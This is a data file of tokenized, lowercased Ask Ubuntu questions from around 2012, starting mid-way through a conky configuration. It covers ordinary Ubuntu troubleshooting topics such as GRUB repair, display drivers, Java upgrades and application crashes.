100 } $ { font neuropolitical : size=15 } $ { color ffffff } $ { voffset -35 } $ { time % y } $ { font neuropolitical : size=30 } $ { voffset 40 } $ { alignc } $ { time % h } : $ { time % m } $ { goto 175 } $ { voffset -30 } $ { font neuropolitical : size=10 } $ { time % s } $ { voffset 10 } $ { font neuropolitical : size=11 } $ { color ff3300 } $ { alignr } home $ { font } $ { font neuropolitical : size=13 } $ { color ffffff } $ { alignr } temp : $ { weather http : //weather.noaa.gov/pub/data/observations/metar/stations/ lqbk temperature temperature 30 } 째c $ { font } $ { hr } $ { image ~/.conky/logo.png -p 165,10 -s 35x35 } $ { color ffffff } $ { font neuropolitical : size=8 } uptime : $ { uptime_short } $ { color ffffff } $ { font neuropolitical : size=8 } processes : $ { processes } $ { color ffffff } $ { font neuropolitical : size=8 } running : $ { running_processes } $ { color ff3300 } $ { goto 125 } $ { voffset 27 } cpu $ { color ffffff } $ { goto 125 } $ { cpu cpu0 } % $ { color ff3300 } $ { goto 125 } $ { voffset 55 } ram $ { color ffffff } $ { goto 125 } $ { memperc } % $ { color ff3300 } $ { goto 125 } $ { voffset 56 } swap $ { color ffffff } $ { goto 125 } $ { swapperc } % $ { color ff3300 } $ { goto 125 } $ { voffset 57 } disk $ { color ffffff } $ { goto 125 } $ { fs_used_perc / } % $ { color ff3300 } $ { goto 130 } $ { voffset 55 } net $ { color ffffff } $ { goto 130 } $ { downspeed eth0 } $ { color ffffff } $ { goto 130 } $ { upspeed eth0 } $ { color ff3300 } $ { font neuropolitical : size=8 } $ { alignr } $ { nodename } $ { color ff3300 } $ { font neuropolitical : size=8 } $ { alignr } $ { pre_exec cat /etc/issue.net } $ machine $ { color ff3300 } $ { font neuropolitical : size=8 } $ { alignr } kernel : $ { kernel } $ { hr }
146890	what does this regex mean and why	$ sed `` s/\ ( ^ [ a-z,0-9 ] *\ ) \ ( . *\ ) \ ( [ a-z,0-9 ] * $ \ ) /\1\2 \1/g '' desired_file_name i apreciate it even if you only explain part of it or at lest structure it with words as in s\alphanumerical_at_start\something\alphanumerical_at_end\something_else\global could someone explain what that means , why and are all regex so ... awful ? i know that it replaces the first lowcase alphanumerical word with the last one . but could you explain bit by bit what 's going on here ? what 's with all the /\ and \ ( . *\ ) \ and everything else ? i 'm just lost . edit : here is what i do get : ( ^ [ a-z0-9 ] * ) starting with a trough z and 0 trough 9 ; and [ a-z,0-9 ] * $ is the same but the last word ( however [ 0-9 , a-z ] = just first 2 characters / first character , or the entire word ? ) . also : what does the * or the \ ( . *\ ) \ even mean ?
146898	when clicking below window title bar in kde , window dragging is initiated . can i change this behavior ?	this one is regarding kde in ubuntu 12.04 . the thing is that whenever i click below the window title bar in kde , the window manager always assumes i want to drag the window , not just activate it . clicking the title bar activates the window without dragging it just fine , however i sometimes find it hard to click because it 's rather narrow : ) is there any way to change this behavior ( besides the obvious `` make your title bar larger '' thing ) ? i also assume this is happening to gtk applications only ( firefox , thunderbird , synaptic ) , as i have tried it with several kde apps ( kwrite , ktorrent , gwenview , konsole ) and noticed no such behavior . thanks in advance !
146902	odd error message from ftp connecting on port 22	i am a little confused . i am trying to ftp using port 22 . it says that i am connected , then that i am not connected . here is my output : dan @ voldemort : ~ $ ftp $ hname 22 connected to < hostname > . ssh-2.0-openssh_5.1 ftp > ls not connected . what 's going on ?
146903	make `php` recognized as a command in terminal	i have xampp installed and my php is : /opt/lampp/bin/php-5.3.8 every time i need to execute a php file i need to do this : /opt/lampp/bin/php-5.3.8 testando.php is there another way to execute it besides using symbolic link ? i did this on /etc/init.d/ : sudo ln -s /opt/lampp/bin/php-5.3.8 php why when i need to run php i have to do this ./php instead of just php ? and is there a way to do this without the ./ ? like it was installed via apt-get ?
146904	wifi measurements seem totally off	last time i checked , 30 million terabytes is not a normal network speed . why is the measure so far off ? this is on 12.04 . as far as i know , i 've installed nothing weird on this system . strangely , but turning my wifi off does n't stop the crazy .
146908	nvidia-settings makes one of my dual monitors grey and useless , disables network	i 'm running ubuntu 12.04 64-bit , precise pangolin , with a pny gts 250 1gb video card and a monitor plugged into each of the dvi ports . i 'm using the proprietary drivers ( post-release updates ) . if i set anything to do with separate x screens up in nvidia-settings ( and write it to xorg.conf and reboot ) , my second monitor has a grey background , no menu bar , no ability to have a window on it , the second monitor does n't get picked up in a screneshot , and if i move my mouse cursor to it it 's an ugly black x . plus , my network is unable to connect to anything . if i subsequently delete /etc/x11/xorg.conf and reboot , everything goes back to working , albeit with a single monitor activated . if i set anything to do with twinview up in nvidia-settings , my second monitor starts working , but it is n't seen as a second monitor by ubuntu , so i ca n't apply color calibration to it separately . plus , my mouse gets `` caught '' between the monitors every time i try to move my cursor between the two . what gives ? if it helps , this is the xorg.conf that nvidia-settings generates for separate x screens .
146915	memenu not indicating new mail	the memenu used to change color when new e-mails arrived . with 11.10 and now 12.04 , this is no longer the case . as i understand , this is due to the default use of thunderbird instead of evolution . is it possible to restore this functionality with thunderbird or is it necessary to install evolution ? if the latter , is it a simple matter of installing it , or is there tweaking that must be done ? i see this question has been asked many times before , but it appears that no one has answered it yet . thank you .
146920	booting ubuntu from usb , but then welcome screen stays and nothing happens	i tried booting from the usb , it boots correctly but then the welcome screen stays and nothing happens , even after waiting for an hour . can you please suggest on what should i do to make it work ?
146921	how do i apt-get -y dist-upgrade without a grub config prompt ?	per make apt-get ( or aptitude ) run with -y but not prompt for replacement of configuration files ? i did the following : ec2run ami-3c994355 -- region us-east-1 -n 1 -t m1.large -z us-east-1d on the machine : sudo apt-get update sudo apt-get -y -o dpkg : :options : := '' -- force-confdef '' -o dpkg : :options : := '' -- force-confold '' dist-upgrade i still get a prompt asking me which config file i want to use . these are the lines that come before the prompt : setting up grub-pc ( 1.99-21ubuntu3.1 ) ... then : ┌───────────────────────────────────────────────────────┤ configuring grub-pc ├───────────────────────────────────────────────────────┐ │ a new version of configuration file /etc/default/grub is available , but the version installed currently has been locally modified . │ │ │ │ what do you want to do about modified configuration file grub ? │ │ │ │ install the package maintainer 's version │ ( unrelated , was this too much information ? )
146923	how do i update other ubuntu partitions without rebooting into them ?	i have a number of ubuntu partitions on my computer . this allows me to run previous , current and development versions concurrently . i 'd quite like to install updates to the other partitions , without actually booting into them . so i 'd like to be able to run sudo aptitude update followed by sudo aptitude safe-upgrade . how do i do this ?
146926	am i missing the windows installer ? it keeps taking me to the same page and i keep running around in circles	ok so going here : http : //www.ubuntu.com/download/help/install-ubuntu-with-windows takes you to here : http : //www.ubuntu.com/download/desktop/windows-installer which takes you to here : http : //www.ubuntu.com/download which takes you to here : http : //www.ubuntu.com/download/desktop/windows-installer all while clicking on what i think should begin the installer download ... am i missing something ? ? ? ?
146932	what do i need to write device drivers on ubuntu ?	what do i need to write device drivers on ubuntu ? do i need source code for linux ? what else is needed ?
146933	dock with dual external dvi monitors with intel + nvidia optimus ?	i have a dell latitude e6420 laptop plugged into a docking station , and the dock has 2 monitors ( connected with dvi ) . also note that i 've installed ubuntu alongside ( dual-boot ) windows 7 . i ca n't get the dual monitors to work both on ubuntu ( either 11.10 or 12.04 ) and windows 7 . when i run lspci | grep vga , i get : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ quadro nvs 4200m ] ( rev a1 ) if i then reboot and uncheck optimus setting in the bios during reboot , i 'm able to get the dual monitors to work in ubuntu 12.04 ( but i need to configure them every boot in nvidia settings ) . when i run lspci | grep vga , i get : 01:00.0 vga compatible controller : nvidia corporation gf119 [ quadro nvs 4200m ] ( rev a1 ) but then if i reboot into windows ( leaving the optimus unchecked ) , windows ca n't detect external monitors , and the resolution is unacceptably low . i 've seen on many forum posts that this particular graphics card setup causes lots of headaches . i have n't been able to resolve my problem yet . how can i use my external display on my laptop with intel and nvidia video cards ? how to use external displays with intel driver on a nvidia/intel hybrid system nvidia optimus , unity 3d and dual monitors '' just use vga instead of dvi '' is n't an option because my dock has only 1 vga port ( and 2 dvi ) . switching the bios setting on every reboot and then reconfiguring the display settings every time is tedious , time-consuming , and impractical . do you know how to make this work smoothly ? thanks for your help ! p.s . see also : http : //superuser.com/questions/434358/dell-latitude-e6420-dual-boot-ubuntu-windows-7-optimus-graphics-problems
146934	copy music from ipod to ubuntu	can anyone please help me for this ? in fact i can see the musics in the ipod but they all are like `` hhdw.mp3 '' `` kzde.mp3 '' fppd.mp3 '' ... and i just ca n't rename every single song by listening to it ... do anyone have a solution for that ? thanks
146942	audacity , openshot , ardour fail to launch 12.04 precise	i 'm using a pentium ( r ) dual-core cpu e5300 @ 2.60ghz ă 2 , with geforce 210/pcie/sse2 graphics . 32 bit . i have been using audacity fine in 10.10 , and 11.10 but since upgrading to 12.04 precise , it fails to load . same experience with openshot and ardour . the other media players ; totem , rhythmbox work as normal . i 've tried uninstalling and re-installing . no luck . trying to open audacity from the terminal ( 'cause nothing happens when clicking the icon ) , i get this message : ( audacity:2236 ) : gnome-warning ** : accessibility : failed to find module 'libgail-gnome ' which is needed to make this application accessible alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started segmentation fault ( core dumped ) with openshot , i get : -- -- -- -- -- -- -- -- -- -- -- -- - error 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- failed to import 'from openshot import main' error message : can not import name main -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- openshot ( version 1.4.0 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- process no longer exists : 3949 . creating new pid lock file . segmentation fault ( core dumped ) with ardour , i get : warning : your system has a limit for maximum amount of locked memory ! this might cause ardour to run out of memory before your system runs out of memory . you can view the memory limit with 'ulimit -l ' , and it is normally controlled by /etc/security/limits.conf ardour 2.8.12 ( built using 10144 and gcc version 4.6.1 ) copyright ( c ) 1999-2008 paul davis some portions copyright ( c ) steve harris , ari johnson , brett viren , joel baker ardour comes with absolutely no warranty not even for merchantability or fitness for a particular purpose . this is free software , and you are welcome to redistribute it under certain conditions ; see the source for copying conditions . loading default ui configuration file /etc/ardour2/ardour2_ui_default.conf loading user ui configuration file /home/user/.ardour2/ardour2_ui.conf loading ui configuration file /etc/ardour2/ardour2_ui_dark.rc theme_init ( ) called from internal clearlooks engine ardour : [ info ] : ardour will be limited to 4096 open files loading system configuration file /etc/ardour2/ardour_system.rc ardour : [ info ] : no h/w specific optimizations in use segmentation fault ( core dumped ) i 'm a musician with several projects on the go in these apps , especially audacity . i need them ! pls help
146948	internet on ubuntu 12.04 stopped to work after installing updates from the update manager	i have wireless internet access and it worked well on ubuntu 12.04 lts until today , when i installed updates from the update manager . after the reloading of the computer the sign of internet disappeared and the internet connection stopped working . i went to the network section of the system settings and got such a message : the system network services are not compatible with this version . ping 8.8.8.8 gives the result network is unreachable . the solution offered by drewski22785 below have solved my problem ! thanks to everyone who gave advices !
146951	autostart app with tag in awm	while giving awm a try i encounter some problems . i want to autostart some apps when awm is started with specific tags . here 's the relevant config i use for that . first my tags with layouts : tags = { names = { `` mail '' , `` www '' , `` video '' , `` files '' , 5 , 6 , 7 , 8 , 9 } , layout = { layouts [ 11 ] , layouts [ 11 ] , layouts [ 11 ] , layouts [ 11 ] , layouts [ 1 ] , layouts [ 1 ] , layouts [ 1 ] , layouts [ 1 ] , layouts [ 1 ] } } for s = 1 , screen.count ( ) do -- each screen has its own tag table . tags [ s ] = awful.tag ( tags.names , s , tags.layout ) end now the app-autostart stuff : awful.util.spawn ( `` chromium-browser '' ) awful.util.spawn ( `` firefox '' ) awful.util.spawn ( `` vlc '' ) awful.util.spawn_with_shell ( `` xterm -name files -e mc '' ) awful.util.spawn_with_shell ( `` xterm -name 5term '' ) awful.util.spawn_with_shell ( `` xterm -name 5term '' ) awful.util.spawn_with_shell ( `` xterm -name 5term '' ) awful.util.spawn_with_shell ( `` xterm -name 5term '' ) awful.util.spawn_with_shell ( `` xfce4-power-manager '' ) i use xterm with the -name param to give them custom classes ( for custom tags via rules ) . and now some rules to connect apps with tags : awful.rules.rules = { -- all clients will match this rule . { rule = { } , properties = { border_width = beautiful.border_width , border_color = beautiful.border_normal , focus = true , keys = clientkeys , buttons = clientbuttons } } , { rule = { class = `` mplayer '' } , properties = { floating = true } } , { rule = { class = `` pinentry '' } , properties = { floating = true } } , { rule = { class = `` gimp '' } , properties = { floating = true } } , -- set firefox to always map on tags number 2 of screen 1 . -- { rule = { class = `` firefox '' } , -- properties = { tag = tags [ 1 ] [ 2 ] } } , { rule = { class = `` firefox '' } , properties = { tag = tags [ 1 ] [ 2 ] } } , { rule = { class = `` chromium-browser '' } , properties = { tag = tags [ 1 ] [ 1 ] } } , { rule = { class = `` vlc '' } , properties = { tag = tags [ 1 ] [ 3 ] } } , { rule = { class = `` files '' } , properties = { tag = tags [ 1 ] [ 4 ] } } , { rule = { class = `` 5term '' } , properties = { tag = tags [ 1 ] [ 5 ] } } , } it works for chromium , firefox and vlc but not for the xterms with the `` -name '' param . when i check the xterms after they started with xprop i can see : wm_class ( string ) = `` 5term '' , `` xterm '' i think that sould work , but the xterms are placed on the first workspace/tag .
146956	compiling on the desktop ! ! no ?	so i have compile my first program today , with the help of the `` askubuntu 's members '' ... .. thanks so much ! ! ! ; ) this is what i have compiled : https : //github.com/treeder/logitech_unifier but now , i have some question : 1- i have compiled my file on the desktop i have though it was easier first , but i never though it would create a file on my desktop ... ... so what do you guys do with the file created by the compilation ? i do n't think i need it anymore ... . so do i delete it ? or do i keep it ? is there a folder i should specificaly use for compiling ? thanks for answering those newbies question .
146961	slow speeds when using d-link dwa-140	i 've been trying to get my d-link dwa-140 ( h/w working properly for quite some time . i 've tried several guides including : d'link wireless dwa-140 speeds are crippled on 12.04 but i still have slow and unstable connection . what do i do ? i notice that compiling that file gave me rt5370sta but should n't it be rt3072 ? here is some more information : mattias @ ubuntudator : ~ $ lsusb bus 001 device 004 : id 07d1:3c0a d-link system dwa-140 rangebooster n adapter ( rev.b2 ) [ ralink rt3072 ] lsmod | grep ^rt module size used by rt5370sta 805299 0 rt2800usb 22684 0 rt2800lib 58925 1 rt2800usb rt2x00usb 20762 1 rt2800usb rt2x00lib 55301 3 rt2800usb , rt2800lib , rt2x00usb crc_ccitt 12667 1 rt2800lib sudo modprobe -rf rt5370sta no reaction sudo modprobe -rf rt2800usb disconnected
146965	workspace switcher does n't match workspace settings	i 'm having a couple of problems with the workspace switcher . 1 ) whatever workspace switcher that uses my keyboard shortcuts ( ctrl+alt+arrow ) does n't match the workspace switcher settings in the panel . if i set the panel to have 2 workspaces and i try to switch with the keyboard shortcut , i end up finding that i have 8 workspaces total ; four that change with the keyboard shortcut per workspace in the workspace switcher ( which i can only change between with the mouse ) . if i right click on the workspace switcher and set it to have 1 workspace , i can still use ctrl + alt + arrow to switch between 4 different workspaces . it 's as if i have two nested workspace managers running . if i look at workspace settings in gconf-editor , the settings do n't match the ones shown if i right click on the workspace switcher in the panel . i want to remove one of the two competing programs , any ideas ? 2 ) i ended up setting the workspace switcher to have 1 workspace , and just used the four other workspaces that show up with keyboard shortcuts to work around my first problem . however , i notice that some windows ( libre office , pdf viewer ) tend to get `` dragged '' with me when i switch workspaces ( but only once , they never get dragged back to the original workspace i put them on ) . i 'm using gnome classic instead of unity , i feel this has something to do with these problems but i will eat myself alive before i switch to unity .
146967	how can i copy , recursive directory , only files with a attribute 1 , and reset this a attribute to 0 ?	how can i copy , recursive directory , only files with a attribute 1 , and reset this a attribute to 0 ? thanks , francisco
146970	upgrade mysql to 5.5 on lucid , upgrade server to precise or switch to percona ?	looking into upgrading mysql on our development server to which is running 10.04 so is stuck at mysql 5.1 , as it appears there is no apt-get support for upgrading to 5.5 except by certain 3rd party ppas . so i 'm looking for which route to take and what other people have done : a . follow a couple year old guide to manually install mysql 5.5 and then invest ongoing time into manually downloading and installing security updates every month or two ? b . upgrade 10.04 to 12.04 , and from other peoples experience i work with spend several days working out the kinks of that large upgrade , then i 'll have access to mysql 5.5 and easy apt-get installation of future security updates ? c. switch from mysql to percona server 5.5 and get all the benefits of that version of mysql , plus easy apt-get updates with their ppa ? d. something else ?
146977	grub broken again	please help , my grub is broken again , and again , i do n't know why , maybe latest update , i 'm not sure , it starts to annoy me . error i get when i boot : symbol not found : grub_divmod64_fulll and it prompts grub rescue console : grub rescue > i tried to follow this tut , after booting from live dc i did : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 163.9 gb , 163927522816 bytes 255 heads , 63 sectors/track , 19929 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table disk /dev/sdb : 640.1 gb , 640133946880 bytes 255 heads , 63 sectors/track , 77825 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3dcf5202 device boot start end blocks id system /dev/sdb1 * 1 3917 31463271 7 hpfs/ntfs /dev/sdb2 3918 77826 593667163 f w95 ext 'd ( lba ) /dev/sdb5 3918 43080 314576766 7 hpfs/ntfs /dev/sdb6 77328 77826 4000768 82 linux swap / solaris /dev/sdb7 43081 77197 274041856 83 linux /dev/sdb8 77197 77327 1045504 82 linux swap / solaris partition table entries are not in disk order ubuntu @ ubuntu : ~ $ df -th filesystem type size used avail use % mounted on aufs aufs 1.5g 101m 1.4g 7 % / none devtmpfs 1.5g 700k 1.5g 1 % /dev /dev/sr0 iso9660 686m 686m 0 100 % /cdrom /dev/loop0 squashfs 658m 658m 0 100 % /rofs none tmpfs 1.5g 216k 1.5g 1 % /dev/shm tmpfs tmpfs 1.5g 628k 1.5g 1 % /tmp none tmpfs 1.5g 96k 1.5g 1 % /var/run none tmpfs 1.5g 4.0k 1.5g 1 % /var/lock /dev/sdb1 fuseblk 31g 12g 19g 38 % /mnt ubuntu @ ubuntu : ~ $ sudo mount -- bind /dev /mnt/dev mount : mount point /mnt/dev does not exist ubuntu @ ubuntu : ~ $ sudo mount -- bind /dev/pts /mnt/dev/pts mount : mount point /mnt/dev/pts does not exist ubuntu @ ubuntu : ~ $ sudo mount -- bind /proc /mnt/proc mount : mount point /mnt/proc does not exist ubuntu @ ubuntu : ~ $ sudo mount -- bind /sys /mnt/sys mount : mount point /mnt/sys does not exist ubuntu @ ubuntu : ~ $ sudo chroot /mnt chroot : failed to run command `/bin/bash ' : no such file or directory ubuntu @ ubuntu : ~ $ sudo update-grub /usr/sbin/grub-probe : error : can not stat `aufs ' . any idea ?
146981	how to make a lib file ( libtxc-dxtn0 ) used by only the apps that need it ?	i need libtxc-dxtn for some native linux games to start ( amnesia ) . without it , the game crashes . if i install it , the colors some other games drastically change . so , i install and un-install the package , depending on what i have to start . is there a way to provide the lib to the apps that only need it ? i hope my question is clear enough
146987	how can i automatically kill a process when it 's memory use exceeds a specific limit ?	sometimes when i run skype it takes an enormous amount of memory so much in fact that i ca n't close it and everything just lags like crazy . but this is only sometimes is there a command that can track skype and when it 's taking a huge amount of memory kill it . something like this track skype when memory exceeds xxxx killall skype
146992	how do i upgrade to the latest java 7 while not losing my existing java dependencies and add-ons ?	$ uname -a linux x51 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux $ java -version java version `` 1.6.0_23 '' openjdk runtime environment ( icedtea6 1.11pre ) ( 6b23~pre11-0ubuntu1.11.10.2 ) openjdk 64-bit server vm ( build 20.0-b11 , mixed mode ) i have above versions , which have important stable setup ( for my own application ) : unfortunately i was working always with java 1.6 as shown . but now discovered that many-things are not working because of that version issue . i want to remove the : a ) old java completely ( safely ) b ) switch to new , install openjdk-7 64-bit ( safely ) is it a better idea to simply apply apt-get remove openjdk* . ? or what else would be smarter and safer way ? ( to avoid not losing many other dependencies just only to remove openjdk-6 ) follow up : $ java -version java version `` 1.7.0_09 '' openjdk runtime environment ( icedtea7 2.3.3 ) ( 7u9-2.3.3-0ubuntu1~12.10.1 ) $ sudo update-alternatives -- config java [ sudo ] password for sun : there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1071 auto mode 1 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java 1061 manual mode 2 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1071 manual mode press enter to keep the current choice [ * ] , or type selection number : 1 update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java to provide /usr/bin/java ( java ) in manual mode $ java -version java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.5 ) ( 6b24-1.11.5-0ubuntu1~12.10.1 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode )
146994	new user to linux in general ( setting up a hardware firewall , needs interface config and ufw config help ! )	i 'm very new to this new environment ( coming from windows ) and i need some help setting up a hardware firewall and web server combo . i already have my website set up and i would like some guidance on what i should do next for the firewall portion . is there something i could use that i would not need to rebuild a machine to put on , such as astaro ? ideally something i can apt-get .
146997	12.04 monitor brightness commands ignored	i can not change the brightness of the monitor on a laptop either from the command line or from keyboard shortcuts . i have verified that the file in /sys/class/backlight/acpi_video0/brightness is changing . i have also verified that i am running the nvidia drivers . things i have tried : adding entries to /etc/default/grub the grub_cmdline_linux_default and grub_cmdline_linux entries now read grub_cmdline_linux_default= '' quite nosplash acpi_backlight=vendor '' grub_cmdline_linux= '' noapic '' i have also tried various commands here ( with an update grub and reboot each time ) but nothing has helped i enabled brightness control in /etc/x11/xorg.conf so that it now looks like section `` device '' identifier `` default device '' driver `` nvidia '' option `` nologo '' `` true '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection investigated installing linux-kamal-mjgbacklight and determined it was not applicable to my system nothing seems to have made any difference . i am using an nvidia geforce gt 330m with driver version 295.40 . does anyone have any other suggestions ?
146999	finding the gedit plugin folder	i am a bit confused as to where i should put externally downloaded plugins . i have tried putting them in : /usr/share/gedit/plugins ~/ . local/gedit/plugins ~/ . gnome2/gedit/plugins /usr/lib/gedit/plugins the way i have checked whether the plugins show up or not is going to edit - > preferences - > plugins and looking for the ones i have downloaded ( clickconfig , gedit-developer-plugins- ... ) . since i do not see any new plugins appearing , i have to assume that i am doing something wrong . none of these have worked . i am a bit tired of polluting my system . it 's probably my own fault as it 's written somewhere i have not thought to look . please let me know how to add external plugins to gedit properly . i am running ubuntu 11.10 . my gedit version is 3.2.3 edit : i am still not able to solve this problem . i have tried the following folder now as well , and it has n't worked : ~/ . config/gedit/plugins edit 2 : i am trying to install the plugins in `` gedit-developer-plugins '' as well as the `` clickconfig '' plugin .
147000	how to get more detailed reason for thunderbird crashing ?	i have a computer ( 10.04 ) that was previously running thunderbird 12.0.1 just fine ( installed via apt-get via official ppa ) . i do n't know what happened at the time the problem started since this is a multi-user computer and i was not here . however , every time we try to launch tb , we immediately get a dialog that says : we 're sorry thunderbird had a problem and crashed . things i 've tried : running thunderbird from a terminal produces no output . i tried apt-get remove thunderbird -- purge and then reinstalled deleting the user 's .thunderbird folder and launching still results in a crash attempting to run thunderbird -safe-mode still results in a crash this problem occurs for all users of thunderbird on this computer . is there any way to get more details on why the program is crashing ? for example , the specific error that tb is encountering ? i tried thunderbird -g but i 'm not sure what to do with the debugger . update apt-cache policy thunderbird thunderbird : installed : 12.0.1+build1-0ubuntu0.10.04.1 candidate : 12.0.1+build1-0ubuntu0.10.04.1 version table : *** 12.0.1+build1-0ubuntu0.10.04.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ lucid-updates/main packages 500 http : //security.ubuntu.com/ubuntu/ lucid-security/main packages 100 /var/lib/dpkg/status 11.0.1+build1-0ubuntu0.10.04.1~mts1 0 500 http : //ppa.launchpad.net/mozillateam/thunderbird-stable/ubuntu/ lucid/main packages 3.0.4+nobinonly-0ubuntu4 0 500 http : //us.archive.ubuntu.com/ubuntu/ lucid/main packages
147009	privacy : record activity on ?	in ubuntu 12.04 lts , system settings > privacy > files , 'record activity ' is on by default . what does this mean exactly ? which activities are being recorded ? where can i find the recorded data ?
147010	how to keep the laptop 's temperature low without hardware cleaning ?	last few days i found out that when i open google chrome and the laptop 's fans start working really hard and i can not touch the mousepad because of heating . i use ubuntu 11.10 on my toshiba a350-22z laptop and monitor cpu and hard drive temperature . both cores reached 104 celsius and i read somewhere `` if your processor reaches 105 celsius it harms itself '' . i cleaned the inside of of laptop a year ago but there is a point when the weather reaches about 20 celsius there was no problem . i know hardware cleaning is the best solution but how can i solve with another way ? i think the problem is related to the hot weather outside . is there anybody that has the same problem ? in addition to google chrome , i realized that when i open online video , the processor temperature increases very quickly .
147011	error loading gnome ubuntu session	after restart ubuntu i get this after login : : unable to launch `` gnome-session -- session=ubuntu '' x session -- - '' gnome-session -- session=ubuntu '' not found ; falling back to default session . same thing find it in .xsession-errors gnome start in default mode . any hint ? thanks in advance .
147017	how to move between nautilus panes ?	i believe nautilus is the file system in ubuntu . when i have two tabs open , in say my home directory , how do i move between them easily ? is there a shortcut key ? for example : in firefox , ctrl + tab allows you move directly between tabs and that would be very useful in my own file system .
147019	how can i learn the command which will start an application in unity 's 'system settings ' from the command line ?	how can i discover the command-line name ( i.e . actual location ) of one of unity 's system settings applications ? for example , `` user accounts '' , `` backup '' , `` appearance '' , and so forth ? i wish to know this so i can file a bug report against a particular application !
147022	how to use certificates for eduroam ?	i am trying to connect to an eduroam network with ubuntu 12.04 . i understand you need to use certificates to log in to eduroam . i have looked on the university of east london site , but from here i do n't know what to do . can someone help me understand how to connect to the uel eduroam service
147025	functional differences between lubuntu 12.04 and ubuntu 12.04	i understand that lubuntu utilizes lxde over ubuntu 's unity ( gnome ? ) ; but being new to linux i 'm not sure if that change is going to be simply cosmetic , or if there will be functional differences i need to be aware of . the ubuntu wiki says no , but it is also seems to be a very superficial discussion . i am comfortable ( ish ) with the command line and i suppose my question is more directed in that direction , but any information would be great .
147026	why run sudo apt-get update before installing a package ?	why do we have to run sudo apt-get update before i can run sudo apt-get install package ? i found this very annoying when i am installing a lot of packages . or can i skip the sudo apt-get update part ?
147036	how do you bind the fn key to the ctrl function ?	my laptop has a fn key right where i always expect the ctrl key to be . i would like to make the fn key behave just like the ctrl key so i stop trying to fn+c and fn+v and fn+tab instead of ctrl+c ctrl+v and ctrl+tab . is this possible ? note : i do n't care if i am unable to use the fn key as an actual function key . i never use it for that purpose anyway .
147037	is the current version of ubuntu usable on a ppc mac ?	is the current version of ubuntu usable on a ppc mac ? i 've got a `` lamp shade '' mac from 2003 that i 'd like to recycle into my first linux computer . i 'm not a programmer . so it appeals to me that ubuntu is a download/upload kind of thing . apple imac g4 1.25ghz any suggestions ?
147042	scripts in ~/bin do n't work when connecting through ssh	i have some script in my $ home/bin folder . when i access my machine remotely i ca n't use them and i ca n't understand why . they work just fine when i 'm in front of my remote computer . i think it might have something to do with the .bashrc file . the path is set with path= $ path : $ home/bin export path it seems correct to me though . i have also tried to copy the file in the /usr/bin folder logging out and in again , but still i ca n't manage to use my script . if i go in the ~/bin directory and type ./myscript the script work ( it is just that i need to run it from different folders where i have some files to process ) .
147052	step-by-step to run a midi keyboard input device ? 12.04	i have a korg nanokey , and i 'd like to make it produce sound in ubuntu . i 've read that means i should be using rosegarden , and that rosegarden uses jack , but does not install it . ( although checking out ubuntu software center , apparently some components of jack are installed by default ? ) i understand there can be a lot of work setting up jack without it fighting the default sound server . can someone give me a step-by-step method for what i need to do to plug in my midi machine and hear music when i press keys as simply as possible ( without messing up pulseaudio , ie , so i can still access skype and ordinary desktop stuff ) ? i 'm fine installing jack , but i 'd like to sandbox it a little if it has the chance of messing up regular desktop . i 've looked through a couple resources , but i 'm not sure what 's outdated , but the following looked helpful ... http : //ubuntuforums.org/showthread.php ? t=1686497 http : //jackaudio.org/pulseaudio_and_jack
147053	realtek audio manager on kubuntu 12.04	i have realtek soundcard on my hp-430 notebook but i ca n't seems able to have it 's hd sound experience . the sound is lousy compared to windows 7 . i 've been searching all over the 'www ' to find any realtek audio manager for linux or some sort of it but have no luck . all i could find is realtek soundcard driver form their website . i do n't want go back to windows 7 because of it . would anyone help me , please .
147056	how to make runescape work on 12.04 ?	i 'm trying to play runescape on chromium , but it runs really slowly . i have icedtea java from the software center . i had to install it for the game to work at all , but it 's not playable . does anyone have some good settings for me to use , or do i need a better way to have java and chromium work together so runescape can run ? memory : 4.8gb cpu : amd athlon ( tm ) ii x4 620 processor ă 4 gpu : gallium 0.4 on nv50 ( driver ) = geforce 8800 gts os type : 64bit
